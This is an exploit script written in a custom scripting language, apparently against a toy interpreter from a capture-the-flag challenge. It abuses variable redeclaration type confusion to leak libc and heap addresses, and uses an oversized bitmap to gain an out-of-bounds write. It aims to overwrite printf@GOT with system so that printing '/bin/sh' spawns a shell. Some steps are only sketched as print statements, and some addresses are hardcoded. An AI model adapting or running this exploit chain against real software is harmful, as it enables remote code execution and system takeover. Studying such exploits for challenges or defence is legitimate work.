print("=== RCE: Corrupt Variable to Write to GOT ===");

print("Step 1: Leak libc");
string v2 = "BBBBBBBB";
int v2 = 4231312;
int leaked = length(v2);
print("Leaked:");
print(leaked);

print("Step 2: Leak heap");
int leak1 = 0;
string leak1 = "marker";
int heapaddr = leak1;
print("Heap:");
print(heapaddr);

print("Step 3: Create target");
string target = "target";
int targetaddr = target;
print("Target:");
print(targetaddr);

print("Step 4: system_addr = 139879858407248");
print("printf@GOT = 0x409048");

print("Step 5: Create bitmap");
bitmap b1 = create(9223372036854775807, 2);

print("Step 6: Estimate addresses");
int entryaddr = targetaddr - 768;
int valueptraddr = entryaddr + 40;
print("entryaddr:");
print(entryaddr);
print("valueptraddr:");
print(valueptraddr);

print("Step 7: Try bitmap buffer = heapaddr - 0x1000");
int bitmapptr = heapaddr - 4096;
int offset = valueptraddr - bitmapptr;
int bitindex = offset * 8;
print("bitmapptr:");
print(bitmapptr);
print("offset:");
print(offset);
print("bit_index:");
print(bitindex);

if (offset >= 0 && bitindex < 9223372036854775807) {
    print("Valid offset - can write!");
    print("Writing printf@GOT to value_ptr...");
    print("This requires 64 set() calls");
    print("Generated by Python helper");
} else {
    print("Invalid offset - try different bitmap buffer location");
}

print("Step 8: After corruption, write system to GOT");
print("target = system_addr");
print("This writes system_addr to printf@GOT");

print("Step 9: Trigger");
print("print with /bin/sh");

